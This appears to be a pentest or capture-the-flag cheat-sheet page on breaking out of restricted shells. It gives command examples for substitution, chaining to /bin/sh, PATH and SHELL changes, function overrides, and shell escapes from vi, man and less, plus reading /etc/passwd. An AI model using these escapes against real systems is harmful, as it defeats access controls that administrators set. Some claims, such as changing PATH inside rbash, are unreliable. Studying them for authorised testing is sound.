Skip to content

Escaping Restricted Shells

Restricted shells (e.g., rbash, rksh, rzsh) limit user capabilities by restricting commands, directory access, and environment modifications. Below are various techniques to escape restricted shells.

But first, when we land on an restricted shell we can enumerate available commands and also what is accessible:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# First, we locate the folder with the accepted binaries
echo $PATH

# Second, if ls is restricted, we can use echo `*`. For instance, for printing the files in current directory
echo *

# If the PATH was /home/user/bin, we can list the contents of PATH (the commands we can execute) with echo
echo /home/user/bin/*

# Also, if echo works, but not cat or some redirections characters, we can use that in out favor to read, for instance a file:
echo $(< flag.txt)

1. Command Injection

If the restricted shell allows executing certain commands with arguments, you can inject additional commands.

1
ls -l `pwd`

or using $():

1
ls -l $(pwd)

Another example:

1
echo $(whoami)

If pwd or whoami is unrestricted, they will execute.

2. Command Substitution

Using backticks (`command`) or $() allows command execution.

1
echo `id`

or:

1
echo $(id)

This prints user information even if id is restricted.

3. Command Chaining

Using ;, |, &&, or || to append an unrestricted command.

1
echo "Restricted Shell"; /bin/sh

or:

1
ls -l | /bin/sh

If /bin/sh isn't restricted, this will drop into an unrestricted shell.

4. Environment Variables

Modifying $PATH or $SHELL to execute commands.

1
2
export PATH=/bin:/usr/bin:$PATH
/bin/sh

or:

1
2
export SHELL=/bin/sh
exec /bin/sh

This changes the default shell to /bin/sh, possibly escaping the restricted environment.

5. Shell Functions

Defining a function to execute an unrestricted shell.

1
2
function myescape { /bin/sh; }
myescape

or overriding a built-in command:

1
2
ls() { /bin/sh; }
ls

If /bin/sh is available, this escapes the restricted shell.

6. Using Built-in Commands

If vi or nano is allowed, they can spawn an unrestricted shell.

Example using vi:

1
vi

Inside vi, press ESC and type:

1
2
:set shell=/bin/sh
:shell

If vi is available, it spawns a new unrestricted shell.

7. Using man to Execute Commands

If man is allowed:

1
2
man man
!/bin/sh

Typing !/bin/sh inside man spawns a new shell.

8. Exploiting less or more

If less or more is available:

1
less /etc/passwd

Then type:

1
!sh

This launches an unrestricted shell.

9. Using SSH to Escape

If ssh is allowed:

1
ssh user@localhost /bin/sh

This spawns an unrestricted shell if SSH access is permitted.

10. Backgrounding a Process

If Ctrl + Z works, suspend the shell and launch another shell.

Example:

1
vi

Then press Ctrl + Z to suspend it and try:

1
/bin/sh

or:

1
fg

Sometimes this drops you into an unrestricted shell.

These techniques vary depending on the level of restriction, but one or a combination of them often works to escape restricted shells.

Last update: 2025-02-12
Created: February 12, 2025 20:36:23